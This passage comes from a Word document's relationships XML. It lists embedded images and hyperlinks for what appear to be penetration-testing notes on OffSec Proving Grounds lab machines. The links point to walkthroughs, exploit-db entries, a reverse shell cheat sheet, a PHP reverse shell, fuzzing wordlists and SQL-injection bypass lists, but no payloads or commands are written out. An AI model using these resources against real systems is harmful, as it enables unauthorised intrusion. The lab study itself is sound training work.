Target="media/image392.png"/><Relationship Id="rId649" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId406" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image525.png"/><Relationship Id="rId648" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image407.png"/><Relationship Id="rId405" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image523.png"/><Relationship Id="rId647" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://systemweakness.com/dc-4-vulnhub-98d97fb0fea4" TargetMode="External"/><Relationship Id="rId889" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Cron" TargetMode="External"/><Relationship Id="rId880" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image443.png"/><Relationship Id="rId1230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.png"/><Relationship Id="rId400" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/peass-ng/PEASS-ng/releases" TargetMode="External"/><Relationship Id="rId642" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image92.png"/><Relationship Id="rId884" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Cron" TargetMode="External"/><Relationship Id="rId1231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/49067" TargetMode="External"/><Relationship Id="rId641" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image192.png"/><Relationship Id="rId883" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Cron" TargetMode="External"/><Relationship Id="rId1232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/49067" TargetMode="External"/><Relationship Id="rId640" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://software-sinner.medium.com/offensive-security-proving-grounds-ha-natraj-e11c8053d7cb" TargetMode="External"/><Relationship Id="rId882" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image117.png"/><Relationship Id="rId1233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.png"/><Relationship Id="rId881" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image488.png"/><Relationship Id="rId1234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image165.png"/><Relationship Id="rId1224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/KryoCeph/Mobile-Mouse-3.6.0.4-Exploit" TargetMode="External"/><Relationship Id="rId1225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.183.143:80/FUZZ" TargetMode="External"/><Relationship Id="rId1226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.183.143:80/FUZZ" TargetMode="External"/><Relationship Id="rId1227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.183.143:80/api/FUZZ%20-w%20/usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-words.txt" TargetMode="External"/><Relationship Id="rId1228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.183.143:80/api/FUZZ%20-w%20/usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-words.txt" TargetMode="External"/><Relationship Id="rId1229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image258.png"/><Relationship Id="rId635" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@barrattjack89/pg-play-pwned1-walkthrough-651ce326d091" TargetMode="External"/><Relationship Id="rId877" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netfilter.org/" TargetMode="External"/><Relationship Id="rId634" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image278.png"/><Relationship Id="rId876" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://packages.debian.org/sid/iptables-persistent" TargetMode="External"/><Relationship Id="rId633" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/peppo" TargetMode="External"/><Relationship Id="rId875" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://packages.debian.org/sid/iptables-persistent" TargetMode="External"/><Relationship Id="rId632" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image459.png"/><Relationship Id="rId874" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/8/iptables" TargetMode="External"/><Relationship Id="rId639" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image502.png"/><Relationship Id="rId638" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/" TargetMode="External"/><Relationship Id="rId637" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/12DXL3Nczy0m3E8wH0nIzTWTMNUeCWNXsjHCMxse9w3Q/edit?usp=sharing" TargetMode="External"/><Relationship Id="rId879" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image130.png"/><Relationship Id="rId636" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image446.png"/><Relationship Id="rId878" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netfilter.org/" TargetMode="External"/><Relationship Id="rId631" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingarticles.in/lxd-privilege-escalation/" TargetMode="External"/><Relationship Id="rId873" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/8/iptables" TargetMode="External"/><Relationship Id="rId1220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@huntersherlock11/mice-proving-ground-walk-through-9f12f938920a" TargetMode="External"/><Relationship Id="rId630" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingarticles.in/lxd-privilege-escalation/" TargetMode="External"/><Relationship Id="rId872" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image324.png"/><Relationship Id="rId1221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/p0dalirius/RemoteMouse-3.008-Exploit" TargetMode="External"/><Relationship Id="rId871" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-72-proving-grounds-sybaris-b362f337365c" TargetMode="External"/><Relationship Id="rId1222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image198.png"/><Relationship Id="rId870" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-sybaris-491b23545014" TargetMode="External"/><Relationship Id="rId1223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/KryoCeph/Mobile-Mouse-3.6.0.4-Exploit" TargetMode="External"/><Relationship Id="rId829" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.pcmag.com/encyclopedia/term/smtp" TargetMode="External"/><Relationship Id="rId828" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.pcmag.com/encyclopedia/term/smtp" TargetMode="External"/><Relationship Id="rId827" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@whitebearr82/pgpractice-linux-postfish-192-168-56-137-9a48d8577c5f" TargetMode="External"/><Relationship Id="rId822" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:it@postfish.off" TargetMode="External"/><Relationship Id="rId821" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image462.png"/><Relationship Id="rId820" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@huwanyu94/proving-grounds-practice-hepet-walkthrough-ee7e051af47b" TargetMode="External"/><Relationship Id="rId826" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@whitebearr82/pgpractice-linux-postfish-192-168-56-137-9a48d8577c5f" TargetMode="External"/><Relationship Id="rId825" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://banua.medium.com/proving-grounds-hepet-oscp-prep-2025-practice-17-3bdc3ad86495" TargetMode="External"/><Relationship Id="rId824" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@whitebearr82/pgpractice-linux-postfish-192-168-56-137-9a48d8577c5f" TargetMode="External"/><Relationship Id="rId823" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:it@postfish.off" TargetMode="External"/><Relationship Id="rId819" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://freedium.cfd/https://medium.com/@huwanyu94/proving-grounds-practice-hepet-walkthrough-ee7e051af47b" TargetMode="External"/><Relationship Id="rId818" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/0bfxgh0st/MMG-LO/" TargetMode="External"/><Relationship Id="rId817" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://banua.medium.com/proving-grounds-hepet-oscp-prep-2025-practice-17-3bdc3ad86495" TargetMode="External"/><Relationship Id="rId816" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image259.png"/><Relationship Id="rId811" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image468.png"/><Relationship Id="rId810" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image308.png"/><Relationship Id="rId815" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image455.png"/><Relationship Id="rId814" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image285.png"/><Relationship Id="rId813" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:jim@relia.com" TargetMode="External"/><Relationship Id="rId812" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image343.png"/><Relationship Id="rId609" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hashes.com/en/tools/hash_identifier" TargetMode="External"/><Relationship Id="rId608" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hashes.com/en/tools/hash_identifier" TargetMode="External"/><Relationship Id="rId607" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image265.png"/><Relationship Id="rId849" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://freedium.cfd/https://medium.com/@huwanyu94/proving-grounds-practice-hepet-walkthrough-ee7e051af47b" TargetMode="External"/><Relationship Id="rId602" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Bourne_shell" TargetMode="External"/><Relationship Id="rId844" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId601" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Bourne_shell" TargetMode="External"/><Relationship Id="rId843" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://banua.medium.com/proving-grounds-hepet-oscp-prep-2025-practice-17-3bdc3ad86495" TargetMode="External"/><Relationship Id="rId600" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#bash-tcp" TargetMode="External"/><Relationship Id="rId842" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@whitebearr82/pgpractice-linux-postfish-192-168-56-137-9a48d8577c5f" TargetMode="External"/><Relationship Id="rId841" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@whitebearr82/pgpractice-linux-postfish-192-168-56-137-9a48d8577c5f" TargetMode="External"/><Relationship Id="rId606" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/file-upload/alt-extensions-php.txt" TargetMode="External"/><Relationship Id="rId848" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image143.png"/><Relationship Id="rId605" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/file-upload/alt-extensions-php.txt" TargetMode="External"/><Relationship Id="rId847" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image203.png"/><Relationship Id="rId604" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image164.png"/><Relationship Id="rId846" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image539.png"/><Relationship Id="rId603" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image326.png"/><Relationship Id="rId845" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image350.png"/><Relationship Id="rId840" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:it@postfish.off" TargetMode="External"/><Relationship Id="rId839" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:it@postfish.off" TargetMode="External"/><Relationship Id="rId838" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image378.png"/><Relationship Id="rId833" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image180.png"/><Relationship Id="rId832" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mailtrap.io/blog/smtp-commands-and-responses/" TargetMode="External"/><Relationship Id="rId831" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mailtrap.io/blog/smtp-commands-and-responses/" TargetMode="External"/><Relationship Id="rId830" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image122.png"/><Relationship Id="rId837" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image534.png"/><Relationship Id="rId836" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@whitebearr82/pgpractice-linux-postfish-192-168-56-137-9a48d8577c5f" TargetMode="External"/><Relationship Id="rId835" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:it@postfish.off" TargetMode="External"/><Relationship Id="rId834" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:it@postfish.off" TargetMode="External"/><Relationship Id="rId1059" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image559.png"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jpillora/chisel" TargetMode="External"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/nagoya-proving-grounds-practice-walkthrough-active-directory-bef41999b46f" TargetMode="External"/><Relationship Id="rId469" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/tjomk/wfuzz/blob/master/wordlist/fuzzdb/attack-payloads/sql-injection/exploit/mysql-injection-login-bypass.txt" TargetMode="External"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://notes.benheater.com/books/network-pivoting/page/port-forwarding-with-chisel" TargetMode="External"/><Relationship Id="rId468" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/cockpit-proving-ground-practice-walkthrough-c95930e9523d" TargetMode="External"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://notes.benheater.com/books/network-pivoting/page/port-forwarding-with-chisel" TargetMode="External"/><Relationship Id="rId467" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.wiki/en/pentesting-web/sql-injection/index.html?highlight=SQL%20inject#confirming-with-timing" TargetMode="External"/><Relationship Id="rId1290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/hadrian3689/nagiosxi_5.6.6/blob/main/exploit.py" TargetMode="External"/><Relationship Id="rId1291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ahoner.medium.com/pg-photographer-walkthrough-offensive-security-proving-grounds-play-boxes-567eaebecbef" TargetMode="External"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jpillora/chisel" TargetMode="External"/><Relationship Id="rId1050" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/network-services-pentesting/3128-pentesting-squid" TargetMode="External"/><Relationship Id="rId1292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@anushka18599/offsec-proving-grounds-walkthrough-monster-774a871c6ad7" TargetMode="External"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/golang/go/issues/58550" TargetMode="External"/><Relationship Id="rId462" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image531.png"/><Relationship Id="rId1051" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image504.png"/><Relationship Id="rId1293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-monster-59a4a4283449" TargetMode="External"/><Relationship Id="rId461" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image438.png"/><Relationship Id="rId1052" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.png"/><Relationship Id="rId1294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://abdilahrf.github.io/cve/login-rate-limiting-bypass" TargetMode="External"/><Relationship Id="rId460" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.mysql.com/doc/refman/8.0/en/information-schema-introduction.html" TargetMode="External"/><Relationship Id="rId1053" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image383.png"/><Relationship Id="rId1295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@anushka18599/offsec-proving-grounds-walkthrough-monster-774a871c6ad7" TargetMode="External"/><Relationship Id="rId1054" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://getfoxyproxy.org/" TargetMode="External"/><Relationship Id="rId1296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@d3mi/vegeta1-offsec-proving-grounds-acd77f1b5b61" TargetMode="External"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image160.png"/><Relationship Id="rId466" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-injection/cheat-sheet" TargetMode="External"/><Relationship Id="rId1055" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://getfoxyproxy.org/" TargetMode="External"/><Relationship Id="rId1297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@huwanyu94/proving-grounds-play-sosimple-walkthrough-18bc36ab859e" TargetMode="External"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jpillora/chisel/blob/5ad1141361e10c4eb058ee8e7a87d2e481e17929/.github/workflows/ci.yml#L13" TargetMode="External"/><Relationship Id="rId465" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image333.png"/><Relationship Id="rId1056" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image129.png"/><Relationship Id="rId1298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wpscan.com/vulnerability/7b412469-cc03-4899-b397-38580ced5618/" TargetMode="External"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jpillora/chisel/blob/5ad1141361e10c4eb058ee8e7a87d2e481e17929/.github/workflows/ci.yml#L13" TargetMode="External"/><Relationship Id="rId464" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/MD5" TargetMode="External"/><Relationship Id="rId1057" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image229.png"/><Relationship Id="rId1299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Inching-Towards-Intelligence/pg-play-sosimple-53-100-21453c1ef208" TargetMode="External"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/GoogleContainerTools/distroless/issues/1342" TargetMode="External"/><Relationship Id="rId463" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/MD5" TargetMode="External"/><Relationship Id="rId1058" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.png"/><Relationship Id="rId1048" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp" TargetMode="External"/><Relationship Id="rId1049" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp" TargetMode="External"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.gnu.org/software/libc/" TargetMode="External"/><Relationship Id="rId459" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.mysql.com/doc/refman/8.0/en/information-schema-introduction.html" TargetMode="External"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image311.png"/><Relationship Id="rId458" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image112.png"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image274.png"/><Relationship Id="rId457" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image524.png"/><Relationship Id="rId699" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image393.png"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/ncat/" TargetMode="External"/><Relationship Id="rId456" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image232.png"/><Relationship Id="rId698" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nongiach/sudo_inject" TargetMode="External"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image224.png"/><Relationship Id="rId1280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hacktricks.boitatech.com.br/linux-unix/privilege-escalation/interesting-groups-linux-pe#disk-group" TargetMode="External"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.gnu.org/software/libc/" TargetMode="External"/><Relationship Id="rId1281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/ctf-200-02-offsec-proving-grounds-practice-labor-day-ctf-machine-walkthrough-78a5497ce589" TargetMode="External"/><Relationship Id="rId451" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/sql_union.asp" TargetMode="External"/><Relationship Id="rId693" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@barrattjack89/pg-practice-pelican-walkthrough-72190462e821" TargetMode="External"/><Relationship Id="rId1040" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.razrsec.uk/moneybox-walkthrough/" TargetMode="External"/><Relationship Id="rId1282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId450" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/sql_union.asp" TargetMode="External"/><Relationship Id="rId692" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId1041" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId1283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://edbertsumicad.medium.com/pg-workaholic-privilege-escalation-via-misconfigured-plugin-loader-assume-breach-355a869b2efd" TargetMode="External"/><Relationship Id="rId691" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/12DXL3Nczy0m3E8wH0nIzTWTMNUeCWNXsjHCMxse9w3Q/edit?usp=sharing" TargetMode="External"/><Relationship Id="rId1042" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image309.png"/><Relationship Id="rId1284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-roquefort-e61052190965" TargetMode="External"/><Relationship Id="rId690" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image175.png"/><Relationship Id="rId1043" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image476.png"/><Relationship Id="rId1285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/49383" TargetMode="External"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/ncat/" TargetMode="External"/><Relationship Id="rId455" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image469.png"/><Relationship Id="rId697" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sanaullahamankorai.medium.com/proving-ground-play-seppuku-walkthrough-c0de8e79688d" TargetMode="External"/><Relationship Id="rId1044" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId1286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/12DXL3Nczy0m3E8wH0nIzTWTMNUeCWNXsjHCMxse9w3Q/edit?usp=sharing" TargetMode="External"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man.openbsd.org/ssh_config#ProxyCommand" TargetMode="External"/><Relationship Id="rId454" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image177.png"/><Relationship Id="rId696" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vaibhavc418/offensive-security-onsystemshelldredd-walkthrough-df7f44036f17" TargetMode="External"/><Relationship Id="rId1045" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image111.png"/><Relationship Id="rId1287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://themcsam.github.io/posts/tarFs-PoC/" TargetMode="External"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man.openbsd.org/ssh_config#ProxyCommand" TargetMode="External"/><Relationship Id="rId453" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/sql_like.asp" TargetMode="External"/><Relationship Id="rId695" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/pelican" TargetMode="External"/><Relationship Id="rId1046" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php" TargetMode="External"/><Relationship Id="rId1288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/52268" TargetMode="External"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man.openbsd.org/ssh_config#ProxyCommand" TargetMode="External"/><Relationship Id="rId452" 